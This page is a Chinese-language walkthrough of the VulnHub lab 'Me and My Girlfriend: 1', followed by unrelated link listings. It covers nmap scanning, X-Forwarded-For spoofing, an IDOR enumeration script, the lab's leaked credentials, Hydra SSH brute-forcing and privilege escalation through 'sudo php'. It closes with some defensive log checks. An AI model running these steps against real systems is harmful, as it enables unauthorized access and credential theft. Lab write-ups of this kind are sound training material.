当前位置: 首页 > news >正文

VulnHub靶机 Me and My Girlfriend: 1 实战:3步利用越权漏洞获取SSH凭证

VulnHub靶机实战:越权漏洞与SSH凭证获取的三步攻击链

靶机渗透测试的核心逻辑

在网络安全实战中,越权漏洞(IDOR)常被忽视却危害巨大。以VulnHub靶机"Me and My Girlfriend: 1"为例,我们可构建一条从Web漏洞到系统权限的完整攻击链。不同于常规的漏洞扫描,这种组合攻击更贴近真实渗透场景。

关键攻击阶段

  1. 伪造客户端IP绕过访问限制
  2. 利用IDOR漏洞枚举用户凭证
  3. 通过凭证复用获取SSH访问权限

1. 环境侦察与访问控制绕过

1.1 靶机发现与端口扫描

使用Nmap进行基础网络侦察:

nmap -sn 192.168.183.0/24 -oG -

发现靶机IP后,进行服务扫描:

nmap -sV 192.168.183.135

典型输出显示开放80(HTTP)和22(SSH)端口。

1.2 HTTP头注入绕过地域限制

当访问Web服务出现本地限制提示时,可通过Burp Suite修改请求头:

X-Forwarded-For: 127.0.0.1

或使用cURL直接测试:

curl -H "X-Forwarded-For: 127.0.0.1" http://192.168.183.135

注意:现代系统应使用Forwarded标准头,但旧系统仍广泛使用非标准的X-Forwarded-For

2. 越权漏洞深度利用

2.1 基础账户注册与测试

  1. 注册测试账户(如hacker/123)
  2. 登录后观察URL中的用户ID参数(如user_id=2

2.2 IDOR漏洞验证

修改用户ID参数访问其他用户信息:

http://192.168.183.135/profile?user_id=1

漏洞特征对比表

正常行为存在漏洞表现
返回403错误返回目标用户数据
显示空白页面显示完整用户资料
跳转登录页保持当前会话

2.3 自动化凭证收集

使用Python脚本批量获取用户信息:

import requests base_url = "http://192.168.183.135/profile?user_id=" headers = {"X-Forwarded-For": "127.0.0.1"} for user_id in range(1,10): response = requests.get(f"{base_url}{user_id}", headers=headers) if response.status_code == 200: print(f"[+] User {user_id}: {response.text}")

3. 凭证复用与权限提升

3.1 SSH爆破实战

从收集到的用户信息中提取可能的账号密码组合:

alice:4lic3 abdikasepak:dorrrrr

使用Hydra进行SSH爆破:

hydra -L users.txt -P passwords.txt ssh://192.168.183.135 -t 4

3.2 成功登录后的操作

获取初始shell后:

ssh alice@192.168.183.135

执行基础信息收集:

find / -name "*flag*" 2>/dev/null sudo -l

3.3 通过PHP实现权限提升

当发现sudo权限配置不当:

User alice may run the following commands on target: (ALL) NOPASSWD: /usr/bin/php

利用PHP执行系统命令:

sudo php -r "system('/bin/bash');"

权限提升方法对比

方法适用场景风险等级
Sudo滥用配置错误
SUID滥用错误权限
内核漏洞未打补丁

防御措施与检测方案

开发层面

  1. 实施严格的权限验证(如RBAC)
  2. 使用UUID替代自增ID
  3. 添加资源访问日志审计

运维层面

# 监控异常sudo使用 grep sudo /var/log/auth.log | grep -v "COMMAND" # 检查SSH爆破尝试 grep "Failed password" /var/log/auth.log

攻击链可视化

  1. 信息收集→ 2.漏洞利用→ 3.横向移动→ 4.权限提升

每个阶段应保留完整操作记录,建议使用如下命令记录会话:

script -q -c "命令" session.log

在真实渗透测试中,这种组合攻击成功率往往高于单一漏洞利用。关键在于理解业务逻辑与权限体系的薄弱环节,而非依赖自动化工具。

http://www.jsqmd.com/news/1167570/

相关文章:

  • 积家中国大陆官方售后服务中心|官方网站权威指南(2026年7月最新) - 积家中国服务中心
  • 从“招生难”到“精准匹配”:AI教育咨询的底层逻辑
  • 拒绝碎片化焦虑:AI开发者必读的“私人图书馆”构建指南
  • 抖音内容收藏利器:3步实现无水印批量下载与智能管理
  • SAP EWM /SCWM/POST 实战:3种库存状态变更场景与8步后台配置详解
  • 2026年7月最新成都真力时官方售后维修服务网点地址与客服电话 - 亨得利官方服务中心
  • DeepSeek 开放平台密钥创建,OpenClaw2.7.9 客户端接入完整教程(含安装包)
  • 3分钟解决中文乱码:GBK转UTF-8桌面工具完全指南
  • 当文字成为设计语言:开源项目如何重构CAD创作流程?
  • 荣耀小平板产品线规划曝光:分双版本,成本与定位双向取舍
  • 全局矩阵乘(GM→GM)
  • 关于2026年7月宝珀中国区售后网点信息完善公告|搬迁门店原址停用新址说明 - 宝珀官方维修中心
  • Spring Boot 入门指南:从零开始构建微服务
  • 终极指南:如何快速在Unity与Unreal Engine中集成AutoRemesher自动重网格化工具
  • DSPE-PEG-FA靶向效率偏低?从分子结构修饰剖析3大核心诱因
  • 2026年AI写作真能替代人工?我实测7款工具后发现,PaperRed这个结果出乎意料
  • 告别乱码困扰:5分钟掌握GBK转UTF-8编码转换的终极方案
  • 滚动视差动画的数学原理与性能友好的实现方式
  • 2026年7月最新宝珀上海奉贤龙湖天街维修保养服务电话 - 宝珀官方售后服务中心
  • 积家中国区官方售后服务中心|官方网站权威公布(2026年7月最新) - 积家中国服务中心
  • npm 8.x/9.x 安装依赖:5步系统化排错流程与关键日志解读
  • 深度解析Ornith-1.0-9B-4bit架构:Qwen3.5模型如何实现4bit量化与多模态能力融合
  • NVIDIA Rubin AI平台:六芯片协同设计如何重塑大规模AI训练与推理
  • 积家中国官方售后服务网络全指南|官方服务电话及地址权威公示(2026年7月最新) - 积家中国服务中心
  • RE2-Rust 快速入门指南:5分钟学会在 C++ 项目中使用 Rust 正则表达式引擎
  • Skyline 实战指南:从零构建企业级异常检测系统
  • STM32F205RB与ADP5350电源管理方案详解
  • 图像数据增强的工程边界:增强太激进会让模型学错东西
  • 如何构建浏览器资源嗅探系统:猫抓(cat-catch)的技术实现方案
  • 2026年7月最新广州天梭官方售后客户服务电话及线下网点地址 - 天梭服务中心